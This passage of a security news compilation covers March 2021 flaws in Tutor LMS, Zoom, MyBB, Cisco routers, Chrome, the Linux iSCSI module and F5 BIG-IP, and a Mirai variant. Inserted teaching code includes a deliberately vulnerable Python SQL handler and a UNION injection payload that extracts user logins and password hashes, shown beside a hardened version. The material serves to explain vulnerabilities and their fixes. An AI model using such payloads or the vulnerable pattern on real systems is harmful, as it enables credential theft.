“Again, there was no SQL sanitization on the user-supplied input, nor was there any use of prepared statements,” researchers said. “This made it possible for an attacker to supply a UNION query in the ‘question_id’ parameter that would execute and provide the direct results of the query in the response to the request.”


The second UNION-based bug lies in the ability to build quizzes as a teacher on a site. The function uses various AJAX actions to make the quiz-building process easy and require fewer page reloads.

“When the ‘question_id’ parameter is supplied, the function uses ‘get_row()’ to obtain the answer data from the database,” according to Wordfence. Here again, there was no SQL sanitization on the user-supplied input.

“This function, along with the tutor_quiz_builder_get_answers_by_question() function, were intended to be for instructor and administrator use only,” explained the researchers. “Unfortunately, however, since they were AJAX actions with no nonce protection or capability checks in place, any authenticated user, including students, had the ability to execute this action and exploit the SQL-injection vulnerability.”

The last SQL injection vulnerability also stems from the quiz-creation feature. Whenever a student takes a quiz, the plugin records the results, but also allows students to go back later and change their answers.

“While retrieving those results, the function used ‘get_results()’ to retrieve the results from the database,” according to the analysis. “Due to the fact that there was no SQL-escaping on the quiz answers as they were recorded, SQL statements could be included as a quiz response. Once the data was retrieved from the database upon accessing the attempt details page, the stored SQL statements would execute and supply the requested information from the database.”
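The handler pattern Wordfence describes for the question-answer and quiz-builder actions, modelled as an added example that is not Wordfence’s or Tutor LMS’s code. Python with an in-memory SQLite database stands in for the PHP plugin and MySQL: an f-string stands in for calling $wpdb->get_results() without $wpdb->prepare(), a role check stands in for a WordPress capability check, and a nonce comparison stands in for check_ajax_referer(). The table and column names, the sample rows and the UNION payload are constructed for illustration and are not taken from the plugin or from Wordfence’s write-up.

```python
import sqlite3


def build_db():
    """Constructed sample data: one admin user and three quiz answers."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        CREATE TABLE tutor_answers (
            answer_id INTEGER PRIMARY KEY, question_id INTEGER, answer_text TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$B-constructed-phpass-hash');
        INSERT INTO tutor_answers VALUES (1, 7, 'Paris');
        INSERT INTO tutor_answers VALUES (2, 7, 'Rome');
        INSERT INTO tutor_answers VALUES (3, 8, 'Berlin');
        """
    )
    return con


def vulnerable_get_answers(con, user, question_id):
    """The pattern described above: any authenticated user may call the action
    (no capability or nonce check) and question_id is spliced into the SQL."""
    sql = ("SELECT answer_id, answer_text FROM tutor_answers "
           f"WHERE question_id = {question_id}")
    return con.execute(sql).fetchall()


def hardened_get_answers(con, user, question_id, nonce, expected_nonce):
    """Same action with the three controls the vulnerable version lacked."""
    if nonce != expected_nonce:              # check_ajax_referer() equivalent
        raise PermissionError("bad nonce")
    if user.get("role") not in ("instructor", "administrator"):
        raise PermissionError("insufficient capability")   # current_user_can() equivalent
    qid = int(question_id)                   # reject anything that is not an integer (%d)
    return con.execute(
        "SELECT answer_id, answer_text FROM tutor_answers WHERE question_id = ?",
        (qid,),
    ).fetchall()


# A student-controlled question_id carrying a UNION query. The appended SELECT returns
# two columns, like the legitimate query, so the leaked rows come back in the same
# response the quiz builder expects.
UNION_PAYLOAD = "7 UNION SELECT ID, user_login || ':' || user_pass FROM wp_users"


def demo():
    """Returns (rows leaked to a student, rows the hardened handler gives an instructor)."""
    con = build_db()
    student = {"role": "student"}
    instructor = {"role": "instructor"}
    leaked = vulnerable_get_answers(con, student, UNION_PAYLOAD)
    legit = hardened_get_answers(con, instructor, "7", "nonce1", "nonce1")
    return leaked, legit


if __name__ == "__main__":
    leaked, legit = demo()
    print("vulnerable handler, student with UNION payload:", leaked)
    print("hardened handler, instructor with question 7:", legit)
```

The hardened version fails closed in the order a WordPress handler should: the nonce and capability checks run before any input is touched, and the integer cast rejects the payload before it reaches the database. Parameter binding alone would have stopped the injection, but without the capability check students could still call an instructor-only action.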

Unprotected AJAX Endpoints
And finally, Wordfence uncovered a raft of unprotected AJAX endpoints.

These “could allow low-level users like students to perform a plethora of actions that allowed them to create new quizzes, modify course information, change grades, escalate privileges and more,” according to researchers.

The most serious of these is the aforementioned high-severity privilege-escalation bug, which has a CVSS score of 8.1.

Tutor LMS has two roles: student and instructor. Students can request to become an instructor, and administrators can directly create new instructors on a given site.

“Unfortunately, both of these features were insecurely implemented,” according to the firm. “Unfortunately, the approval process was vulnerable due to a lack of a capability check, and authenticated students could approve themselves as instructors.”

Additionally, administrators have the option to add new instructors outside of the standard WordPress new user functionality.

“Unfortunately, there was no capability check on this AJAX action so any authenticated user could add a new instructor account and then use that to create potentially malicious content on a site,” researchers explained.

The Perils of Plugins for WordPress
This year is shaping up to be a banner year for WordPress plugin problems, with several coming to light in the first quarter of 2021 alone.

Last week, the Plus Addons for Elementor plugin was found to have a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it’s being actively attacked in the wild.

In February, an unpatched, stored cross-site scripting (XSS) security bug was found to potentially affect 50,000 Contact Form 7 Style plugin users.

And in January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.

Also that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, was found to have a vulnerability that could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.


Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data

19.3.2021 Vulnerebility  Threatpost
A glitch in Zoom’s screen-sharing feature shows parts of presenters’ screens that they did not intend to share – potentially leaking emails or passwords.

A security blip in the current version of Zoom could inadvertently leak users’ data to other meeting participants on a call. However, the data is only leaked briefly, making a potential attack difficult to carry out.

The flaw (CVE-2021-28133) stems from a glitch in the screen sharing function of video conferencing platform Zoom. This function allows users to share the contents of their screen with other participants in a Zoom conferencing call. They have the option to share their entire screen, one or more application windows or just one selected area of their screen.

However, “under certain conditions” if a Zoom presenter chooses to share one application window, the share-screen feature briefly transmits the content of other application windows to meeting participants, according to Germany-based SySS security consultant Michael Strametz, who discovered the flaw, and researcher Matthias Deeg, in a Thursday disclosure advisory (which has been translated via Google).

“The impact in real-life situations would be sharing confidential data in an unintended way to unauthorized people,” Deeg told Threatpost.

The current Zoom client version, 5.5.4 (13142.0301), for Windows is still vulnerable to the issue, Deeg told Threatpost.

The issue occurs in a “reliably reproducible manner” when a user shares one application window (such as presentation slides in a web browser) while opening other applications (such as a mail client) in the background, which are supposed to remain unshared. Researchers found that the contents of the explicitly non-shared application window can be seen for a “brief moment” by meeting participants.

While this would only occur briefly, researchers warn that other meeting participants who are recording the Zoom meeting (either through Zoom’s built-in recording capabilities or via screen recording software like SimpleScreenRecorder) are able to then go back to the recording and fully view any potentially sensitive data leaked through that transmission.

Because this bug would be difficult to actually intentionally exploit (an attacker would need to be a participant in a meeting where data is inadvertently leaked by the bug) the flaw is only medium-severity (5.7 out of 10) on the CVSS scale.

However, “the severity of this issue really depends on the unintended shared data,” Deeg told Threatpost. “In some cases, it doesn’t matter, in other cases, it may cause more trouble.”

For instance, if a conference or webinar panelist was presenting slides to attendees via Zoom, and then opened a password manager or email application in the background, other Zoom participants could glimpse that information.

The researchers published a proof-of-concept video of the attack.

The vulnerability was reported to Zoom on Dec. 2 – however, as of the date of public disclosure of the flaw, on Thursday, researchers said they are “not aware of a fix” despite several inquiries for status updates from Zoom.

“Unfortunately, our questions concerning status updates on January 21 and February 1, 2021, remained unanswered,” Deeg told Threatpost. “I hope that Zoom will soon fix this issue and my only advice for all Zoom users… is to be careful when using the screen sharing functionality and [to follow a] strict ‘clean virtual desktop’ policy during Zoom meetings.”

Threatpost has reached out to Zoom for further comment regarding the flaw, and whether it will be fixed in the upcoming release that’s scheduled to go live March 22.

“Zoom takes all reports of security vulnerabilities seriously,” a Zoom spokesperson told Threatpost. “We are aware of this issue, and are working to resolve it.”

With the coronavirus pandemic driving more organizations to “flatten the curve” by going remote over the past year – and thus various web conferencing platforms – Zoom has been grappling with various security and privacy issues, including attackers hijacking online meetings in what are called Zoom bombing attacks. Other security issues have come to light in Zoom’s platform over the past year – such as one that could have allowed attackers to crack private meeting passcodes and snoop in on video conferences. However, Zoom has also taken important steps to secure its conferencing platform, including beefing up its end-to-end encryption and implementing other security measures.


New Zoom Screen-Sharing Bug Lets Other Users Access Restricted Apps
19.3.2021
Vulnerebility  Thehackernews

A newly discovered glitch in Zoom's screen sharing feature can accidentally leak sensitive information to other attendees in a call, according to the latest findings.

Tracked as CVE-2021-28133, the unpatched security vulnerability makes it possible to reveal contents of applications that are not shared, but only briefly, thereby making it harder to exploit it in the wild.

It's worth pointing out that the screen sharing functionality in Zoom lets users share an entire desktop or phone screen or limit sharing to one or more specific applications or a portion of a screen. The issue stems from the fact that a second application that's overlayed on top of an already shared application can reveal its contents for a short period of time.

"When a Zoom user shares a specific application window via the 'share screen' functionality, other meeting participants can briefly see contents of other application windows which were not explicitly shared," SySS researchers Michael Strametz and Matthias Deeg noted. "The contents of not shared application windows can, for instance, be seen for a short period of time by other users when those windows overlay the shared application window and get into focus."

The flaw, which was tested on versions 5.4.3 and 5.5.4 across both Windows and Linux clients, is said to have been disclosed to the videoconferencing company on December 2, 2020. The lack of a fix even after three months could be attributed in part to the difficulty in exploiting the vulnerability.

But nonetheless, this could have serious consequences depending on the nature of the inadvertently shared data, the researchers warned, adding a malicious participant of a Zoom meeting can take advantage of the weakness by making use of a screen capture tool to record the meeting and playback the recording to view the private information.

We have reached out to Zoom for more details on the fix, and we will update the story if we hear back.


Critical RCE Flaw Reported in MyBB Forum Software—Patch Your Sites
19.3.2021
Vulnerebility  Thehackernews

A pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account.

The flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it released an update (version 1.8.26) on March 10 addressing the issues.

MyBB, formerly MyBBoard and originally MyBulletinBoard, is free and open-source forum software developed using PHP and MySQL.

According to the researchers, the first issue — a nested auto URL persistent XSS vulnerability (CVE-2021-27889) — stems from how MyBB parses messages containing URLs during the rendering process, thus enabling any unprivileged forum user to embed stored XSS payloads into threads, posts, and even private messages.

"The vulnerability can be exploited with minimal user interaction by saving a maliciously crafted MyCode message on the server (e.g. as a post or Private Message) and pointing a victim to a page where the content is parsed," MyBB said in an advisory.

The second vulnerability concerns an SQL injection (CVE-2021-27890) in a forum's theme manager that could result in an authenticated RCE. A successful exploitation occurs when a forum administrator with the "Can manage themes?" permission imports a maliciously crafted theme, or a user, for whom the theme has been set, visits a forum page.

"A sophisticated attacker could develop an exploit for the Stored XSS vulnerability and then send a private message to a targeted administrator of a MyBB board," the researchers outlined in a technical write-up. "As soon as the administrator opens the private message, on his own trusted forum, the exploit triggers. An RCE vulnerability is automatically exploited in the background and leads to a full takeover of the targeted MyBB forum."

Besides the two aforementioned vulnerabilities, version 1.8.26 also resolves four other security shortcomings that were identified by the MyBB Team, including —

CVE-2021-27946 - Improper validation of the number of votes in thread poll options, leading to SQL injection
CVE-2021-27947 - Improper sanitization of certain forum data, causing SQL injection when used in subsequent queries
CVE-2021-27948 - Additional User Groups ID numbers can be saved without proper validation in the Admin Control Panel, resulting in SQL injection, and
CVE-2021-27949 - A reflected XSS vulnerability in custom Moderator Tools, when user input attached to CSRF token-protected POST requests is not properly sanitized
MyBB users are advised to upgrade to the latest version to mitigate the risk associated with the flaws.


Cisco Plugs Security Hole in Small Business Routers
18.3.2021
Vulnerebility  Threatpost

The Cisco security vulnerability exists in the RV132W ADSL2+ Wireless-N VPN Routers and RV134W VDSL2 Wireless-AC VPN Routers.

A popular line of small business routers made by Cisco Systems is affected by a high-severity vulnerability. If exploited, the flaw could allow a remote, albeit authenticated, attacker to execute code or restart affected devices unexpectedly.

Cisco issued fixes on Wednesday for the flaw in its RV132W ADSL2+ Wireless-N VPN routers and RV134W VDSL2 Wireless-AC VPN routers. These routers are described by Cisco as “networking-in-a-box” models that are targeted for small or home offices and smaller deployments.

The vulnerability (CVE-2021-1287) stems from an issue in the routers’ web-based management interface. It ranks 7.2 out of 10 on the CVSS scale, making it high severity.

“A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition on the affected device,” said Cisco on Wednesday.

The Cisco Router Vulnerability
The vulnerability stems from the routers’ web-based management interface improperly validating user-supplied input, said Cisco. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. Of note, the attacker would first need valid credentials for the device (which could be obtained through phishing or another prior compromise, for instance).

Affected are RV132W ADSL2+ Wireless-N VPN routers running a firmware release earlier than Release 1.0.1.15 (which is fixed); and RV134W VDSL2 Wireless-AC VPN Routers running a firmware release earlier than Release 1.0.1.21 (the fixed version). Shizhi He of Wuhan University was credited with reporting the flaw.

“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory,” said Cisco.

Cisco Flaws: Patches Issued This Year
The patch is only the latest from Cisco this year. In February, Cisco rolled out fixes for critical holes in its lineup of small-business VPN routers, which could be exploited by unauthenticated, remote attackers to view or tamper with data, and perform other unauthorized actions on the routers.

In 2021, Cisco also patched various vulnerabilities across its product lineup, including multiple, critical vulnerabilities in its software-defined networking for wide-area networks (SD-WAN) solutions for business users, and a high-severity flaw in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.


New Mirai Variant Leverages 10 Vulnerabilities to Hijack IoT Devices
18.3.2021
IoT  Vulnerebility  Securityweek

Over the past month, a variant of the Mirai botnet was observed targeting new security vulnerabilities within hours after they had been disclosed publicly, researchers with Palo Alto Networks reveal.

Mirai has been around since 2016, and the leak of its source code online that year resulted in dozens of variants being released over the years, each with its own targeting capabilities.

What makes the variant tracked by Palo Alto Networks stand out in the crowd is the fact that, within a four-week timeframe, it started exploiting several vulnerabilities that have been disclosed this year.

On February 23, the Mirai variant was observed targeting CVE-2021-27561 and CVE-2021-27562, two vulnerabilities in the Yealink DM (Device Management) platform that had been disclosed the very same day.

Impacting Yealink DM version 3.6.0.20 and older, the flaws (pre-auth SSRF and command injection, respectively) exist because user-provided data is not properly filtered and could be exploited to execute arbitrary commands as root, without authentication.

On March 3, Palo Alto Networks’ security researchers noticed that the same samples were also using an exploit for CVE-2021-22502, a critical (CVSS score of 9.8) remote code execution vulnerability in Micro Focus Operations Bridge Reporter.

Exploitable without authentication, the security bug exists because a user-supplied string isn’t properly validated when the Token parameter provided to the LogonResource endpoint is handled, allowing an attacker to execute code as root.

Ten days later, on March 13, the samples also incorporated an exploit targeting CVE-2020-26919, a critical vulnerability (CVSS score 9.8) affecting NETGEAR JGS516PE business-grade gigabit switches. The bug is described as “lack of access control at the function level.”

In September 2020, Netgear published an advisory for this vulnerability, advising customers to update the firmware on their devices.

Other vulnerabilities being exploited in these attacks include a SonicWall SSL-VPN bug referred to as VisualDoor, CVE-2020-25506 (D-Link DNS-320 firewall) and CVE-2019-19356 (Netis WF2419 wireless router). Three other security issues are also being exploited, but they have not yet been identified.

“The attacks are still ongoing at the time of this writing. Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” Palo Alto Networks reveals.


Google Warns Mac, Windows Users of Chrome Zero-Day Flaw
16.3.2021
Vulnerebility  Threatpost

The use-after-free vulnerability is the third Google Chrome zero-day flaw to be disclosed in three months.

Google is hurrying out a fix for a vulnerability in its Chrome browser that’s under active attack – its third zero-day flaw so far this year. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems.

The vulnerability exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.

“The Stable channel has been updated to 89.0.4389.90 for Windows, Mac and Linux which will roll out over the coming days/weeks,” according to Google’s Friday security update.

The flaw (CVE-2021-21193) ranks 8.8 out of 10 on the CVSS vulnerability-rating scale, making it high-severity. It is a use-after-free vulnerability, a class of bug in the handling of dynamically allocated memory: if a program keeps a pointer to a memory region after that region has been freed and later dereferences it, an attacker who can arrange for the freed memory to be reallocated with attacker-controlled contents can turn the stale access into memory corruption and, from there, code execution.

Use-After-Free Zero-Day Flaw
According to an IBM X-Force vulnerability report, the flaw could allow a remote attacker to execute arbitrary code on the system.

“By persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,” according to the report.

Further details are scant because “access to bug details and links may be kept restricted until a majority of users are updated with a fix,” according to Google. The bug was credited to an anonymous reporter.

Google also did not provide further specifics on the exploits other than to say it “is aware of reports that an exploit for CVE-2021-21193 exists in the wild.”

Threatpost has reached out to Google for further comment.

Other Google Chrome Security Flaws
Beyond the zero-day flaw, Google issued four other security fixes on Friday.

These included another high-severity use-after-free flaw (CVE-2021-21191), which exists in WebRTC. WebRTC, which stands for web real-time communications, is an open-source project that gives web browsers and mobile applications interactive communications capabilities (such as voice, video and chat). The flaw was reported by someone who goes under the alias “raven” (@raid_akame on Twitter).

Another high-severity flaw is a heap-buffer overflow error (CVE-2021-21192) that stems from Chrome tab groups. The flaw was reported by Abdulrahman Alqabandi with Microsoft Browser Vulnerability Research.

Third Zero-Day Chrome Security Flaw This Year
The use-after-free flaw is the third zero-day flaw to plague Google’s Chrome browser in the past three months — and the second this month alone. Earlier in March, Google said it fixed a high-severity zero-day vulnerability in its Chrome browser, which stems from the audio component of the browser.

And in February, Google warned of a zero-day vulnerability in its V8 open-source web engine that’s being actively exploited by attackers; a patch for which was issued in version 88 of Google’s Chrome browser.

Chrome will in many cases update to its newest version automatically — however, Chrome users can double check if an update has been applied:

Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome
If an update is available Chrome will notify users and then start the download process
Users can then relaunch the browser to complete the update


Experts found three new 15-year-old bugs in a Linux kernel module
14.3.2021
Vulnerebility  Securityaffairs

Three 15-year-old flaws in Linux kernel could be exploited by local attackers with basic user privileges to gain root privileges on vulnerable Linux systems.
GRIMM researchers found three vulnerabilities in the SCSI (Small Computer System Interface) component of the Linux kernel, the issues could be exploited by local attackers with basic user privileges to gain root privileges on unpatched Linux systems.

The Small Computer Systems Interface defined both a parallel I/O bus and a data protocol to connect a wide variety of peripherals (disk drives, tape drives, modems, printers, scanners, optical drives, test equipment, and medical devices) to a host computer.
The flaws have been present in the component since its initial development in 2006.

The first vulnerability, tracked as CVE-2021-27365, is a heap buffer overflow in the iSCSI subsystem.

“The vulnerability is triggered by setting an iSCSI string attribute to a value larger than one page, and then trying to read it.” reads the analysis published by GRIMM researchers. “More specifically, an unprivileged user can send netlink messages to the iSCSI subsystem (in drivers/scsi/scsi_transport_iscsi.c) which sets attributes related to the iSCSI connection, such as hostname, username, etc., via the helper functions in drivers/scsi/libiscsi.c. These attributes are only limited in size by the maximum length of a netlink message (either 2^32 or 2^16 depending on the specific code processing the message).”
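To make the size mismatch concrete, here is an added userspace model of the set/read path described above (example code, not the kernel's own): an attribute setter that is bounded only by the netlink payload limit beside one that also enforces the one-page read buffer, and a page-bounded read side that refuses rather than overflows. All names, the 4096-byte page and the 65536-byte netlink limit are assumptions for the model.

```c
/* Userspace model of an iSCSI string-attribute set/read path.
 * Added example, not kernel code: names and sizes are assumptions. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MODEL_PAGE_SIZE      4096u   /* one-page buffer a sysfs show callback fills */
#define NETLINK_MAX_PAYLOAD  65536u  /* stand-in for the netlink message length limit */

struct iscsi_str_attr {
    char  *value;   /* heap copy of the user-supplied string */
    size_t len;     /* bytes stored, excluding the terminator */
};

/* Store a string attribute received over netlink.
 * check_page_size == 0 reproduces the pattern the report describes: only the
 * netlink payload limit bounds the value, so a value longer than one page is
 * accepted even though the read side only has a page to emit it into.
 * check_page_size != 0 is the hardened form: reject anything that could not
 * be emitted into a single page together with its trailing newline. */
int iscsi_set_str_param(struct iscsi_str_attr *attr, const char *data,
                        size_t len, int check_page_size)
{
    if (len > NETLINK_MAX_PAYLOAD)
        return -EINVAL;
    if (check_page_size && len + 2 > MODEL_PAGE_SIZE)   /* value + '\n' + NUL */
        return -EINVAL;

    char *copy = malloc(len + 1);
    if (!copy)
        return -ENOMEM;
    memcpy(copy, data, len);
    copy[len] = '\0';

    free(attr->value);
    attr->value = copy;
    attr->len = len;
    return 0;
}

/* Bounded read side: emit "<value>\n" into a page-sized buffer without ever
 * writing past it. Returns bytes written, or -E2BIG when the stored value does
 * not fit, which is exactly the case an unbounded sprintf would overflow on. */
int iscsi_show_str_param(const struct iscsi_str_attr *attr, char *page)
{
    const char *v = attr->value ? attr->value : "";
    int n = snprintf(page, MODEL_PAGE_SIZE, "%s\n", v);
    if (n < 0)
        return -EIO;
    if ((size_t)n >= MODEL_PAGE_SIZE)   /* snprintf truncated: refuse instead */
        return -E2BIG;
    return n;
}

void iscsi_free_str_param(struct iscsi_str_attr *attr)
{
    free(attr->value);
    attr->value = NULL;
    attr->len = 0;
}

/* Exercises both paths with a constructed oversized value. Returns 1 when the
 * unchecked setter accepts it, the bounded reader refuses it, the checked
 * setter rejects it up front, and a normal hostname still round-trips. */
int iscsi_attr_demo(void)
{
    char page[MODEL_PAGE_SIZE];
    size_t big_len = MODEL_PAGE_SIZE + 1000;        /* constructed: larger than one page */
    char *big = malloc(big_len);
    if (!big)
        return 0;
    memset(big, 'A', big_len);

    struct iscsi_str_attr attr = { NULL, 0 };
    int ok = 1;

    if (iscsi_set_str_param(&attr, big, big_len, 0) != 0)   ok = 0; /* accepted */
    if (iscsi_show_str_param(&attr, page) != -E2BIG)        ok = 0; /* refused */
    if (iscsi_set_str_param(&attr, big, big_len, 1) != -EINVAL) ok = 0; /* rejected */

    const char *host = "iqn.2021-03.example:initiator";     /* constructed sample */
    if (iscsi_set_str_param(&attr, host, strlen(host), 1) != 0) ok = 0;
    if (iscsi_show_str_param(&attr, page) != (int)strlen(host) + 1) ok = 0;

    iscsi_free_str_param(&attr);
    free(big);
    return ok;
}

int main(void)
{
    printf("iSCSI attribute model: %s\n",
           iscsi_attr_demo() ? "checks hold" : "checks FAILED");
    return 0;
}
```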
The second vulnerability, tracked as CVE-2021-27363, is a heap overflow vulnerability. The researchers discovered a kernel pointer leak that can be used to determine the address of the iscsi_transport structure.

The last flaw, tracked as CVE-2021-27364, is an out-of-bounds kernel read issue that resides in the libiscsi module (drivers/scsi/libiscsi.c).

“Similar to the first vulnerability, an unprivileged user can craft netlink messages that specify buffer sizes that the driver fails to validate, causing a controllable out-of-bounds read.” continues the analysis. “There are multiple user-controlled values that are not validated, including the calculation of the size of the preceding header, allowing for a read of up to 8192 bytes at a controllable 32-bit offset from the original heap buffer.”

The three vulnerabilities can also lead to data leaks and could be exploited to trigger denial of service conditions.

“Due to the non-deterministic nature of heap overflows, the first vulnerability could be used as an unreliable, local DoS. However, when combined with an information leak, this vulnerability can be further exploited as a LPE that allows an attacker to escalate from an unprivileged user account to root. A separate information leak is not necessary, though, since this vulnerability can be used to leak kernel memory as well.” continues the analysis. “The second vulnerability (kernel pointer leak) is less impactful and could only serve as a potential information leak. Similarly, the third vulnerability (out-of-bounds read) is also limited to functioning as a potential information leak or even an unreliable local DoS.”

Attackers could exploit the vulnerabilities to bypass the security features Kernel Address Space Layout Randomization (KASLR), Supervisor Mode Execution Protection (SMEP), Supervisor Mode Access Prevention (SMAP), and Kernel Page-Table Isolation (KPTI).
The flaws affect all Linux distributions where the scsi_transport_iscsi kernel module has been loaded, but the good news is that this isn’t a default setting.

“The vulnerabilities discussed above are from a very old driver in the Linux kernel. This driver became more visible due to a fairly new technology (RDMA) and default behavior based on compatibility instead of risk.” concludes the analysis. “The Linux kernel loads modules either because new hardware is detected or because a kernel function detects that a module is missing.”

Below is the timeline for these flaws:

02/17/2021 – Notified Linux Security Team
02/17/2021 – Applied for and received CVE numbers
03/07/2021 – Patches became available in mainline Linux kernel
03/12/2021 – Public disclosure (NotQuite0DayFriday)


F5, CISA Warn of Critical BIG-IP and BIG-IQ RCE Bugs

12.3.2021 Vulnerebility  Threatpost

The F5 flaws could affect the networking infrastructure for some of the largest tech and Fortune 500 companies – including Microsoft, Oracle and Facebook.

F5 Networks is warning users to patch four critical remote command execution (RCE) flaws in its BIG-IP and BIG-IQ enterprise networking infrastructure. If exploited, the flaws could allow attackers to take full control over a vulnerable system.

The company released an advisory, Wednesday, on seven bugs in total, with two others rated as high risk and one rated as medium risk, respectively. “We strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible,” the company advised on its website.

The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world’s biggest financial institutions and ISPs.

The U.S. Cybersecurity and Infrastructure Agency (CISA) also urged companies using BIG-IP and BIG-IQ to fix two of the critical vulnerabilities, which are being tracked as CVE-2021-22986 and CVE-2021-22987.

The former, with a CVSS rating of 9.8, is an unauthenticated remote command execution vulnerability in the iControl REST interface, according to a detailed breakdown of the bugs in F5’s Knowledge Center. The latter, with a CVSS rating of 9.9, affects the infrastructure’s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages, according to F5.

The two other critically rated vulnerabilities are being tracked as CVE-2021-22991 and CVE-2021-22992. The first, with a CVSS score of 9.0, is a buffer overflow vulnerability that can be triggered when “undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization,” according to F5. This can result in a denial-of-service (DoS) attack, that, in some situations, “may theoretically allow bypass of URL based access control or remote code execution (RCE),” the company warned.

CVE-2021-22992 is also a buffer overflow bug with a CVSS rating of 9. This flaw can be triggered by “a malicious HTTP response to an Advanced WAF/BIG-IP ASM virtual server with Login Page configured in its policy,” according to F5. It also may allow for RCE and “complete system compromise” in some situations, the company warned.

The other three non-critical bugs being patched in F5’s update this week are CVE-2021-22988, CVE-2021-22989 and CVE-2021-22990.

CVE-2021-22988, with a CVSS score of 8.8, is an authenticated RCE that also affects TMUI. CVE-2021-22989, with a CVSS rating of 8.0, is another authenticated RCE that also affects TMUI in Appliance mode, this time when Advanced WAF or BIG-IP ASM are provisioned. And CVE-2021-22990, with a CVSS score of 6.6, is a similar but less dangerous vulnerability that exists in the same scenario, according to F5.

F5 is no stranger to critical bugs in its enterprise networking products. In July, the vendor and other security experts—including U.S. Cyber Command—urged companies to deploy an urgent patch for a critical RCE vulnerability in BIG-IP’s app delivery controllers that was being actively exploited by attackers to scrape credentials, launch malware and more. That bug (CVE-2020-5902) had a CVSS rating of 10 out of 10. Moreover, a delay in patching at the time left systems exposed to the flaw for weeks after F5 released the fix.


F5 addresses critical vulnerabilities in BIG-IP and BIG-IQ
12.3.2021
Vulnerebility  Securityaffairs

Security firm F5 announced the availability of patches for seven vulnerabilities in BIG-IP, four of which have been rated as “critical” severity.
The BIG-IP product family includes hardware, modularized software, and virtual appliances that run the F5 TMOS operating system and provide load balancing, firewall, access control, and threat protection capabilities.

The vendor has released security updates for seven vulnerabilities in BIG-IP products, four of which have been rated critical severity, two high severity, and one medium severity.
“As part of our ongoing security vulnerability management practices, today F5 announced several vulnerabilities and fixes for both BIG-IP and BIG-IQ.” states F5. “The bottom line is that they affect all BIG-IP and BIG-IQ customers and instances—we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible.”

The critical vulnerabilities, tracked as CVE-2021-22986, CVE-2021-22987, CVE-2021-22991, CVE-2021-22992, affect BIG-IP versions 11.6 or 12.x and newer. The CVE-2021-22986 flaw also affects BIG-IQ versions 6.x and 7.x.

The most severe flaw is a remote code execution vulnerability, tracked as CVE-2021-22987, that resides in the Traffic Management User Interface (TMUI). The vulnerability received a CVSS score of 9.9.

“When running in Appliance mode, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages.” reads the advisory published by F5. “This vulnerability allows authenticated users with network access to the Configuration utility, through the BIG-IP management port, or self IP addresses, to execute arbitrary system commands, create or delete files, or disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise and breakout of Appliance mode.”

Another critical flaw, tracked as CVE-2021-22986, is an unauthenticated remote command execution vulnerability that resides in the iControl REST interface. The flaw received a CVSS score of 9.8 and affects both BIG-IP and BIG-IQ.
The vulnerability could be exploited by unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services.

“This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.” reads the advisory.
The two high severity flaws addressed by F5 are CVE-2021-22988 (CVSS score of 8.8) and CVE-2021-22989 (CVSS score of 8.0), while the one rated as medium risk is tracked as CVE-2021-22990 (CVSS score of 6.6).

F5 also addressed 14 additional vulnerabilities, five high severity and nine medium risk.


SAP Stomps Out Critical RCE Flaw in Manufacturing Software

11.3.2021 Vulnerebility  Threatpost
The remote code execution flaw could allow attackers to deploy malware, modify network configurations and view databases.

Enterprise software giant SAP pushed out fixes for a critical-severity vulnerability in its real-time data monitoring software for manufacturing operations. If exploited, the flaw could allow an attacker to access SAP databases, infect end users with malware and modify network configurations.

The critical-bug fix was part of 18 security patches released by SAP addressing new vulnerabilities and updating previously released patches.

The two most critical fixes, which are newly released as part of the security update, included the vulnerability in SAP’s Manufacturing Integration and Intelligence (MII) application for synchronizing manufacturing operations, as well as one in SAP’s NetWeaver AS Java software stack.

“With 18 new and updated SAP Security Notes, SAP’s March Patch Day is slightly below the average amount of patches released in the first two months in 2021,” said researchers with Onapsis in a Wednesday analysis. “With SAP MII, SAP NetWeaver AS Java and SAP HANA, three different applications are affected this time by critical vulnerabilities (HotNews and High Priority).”

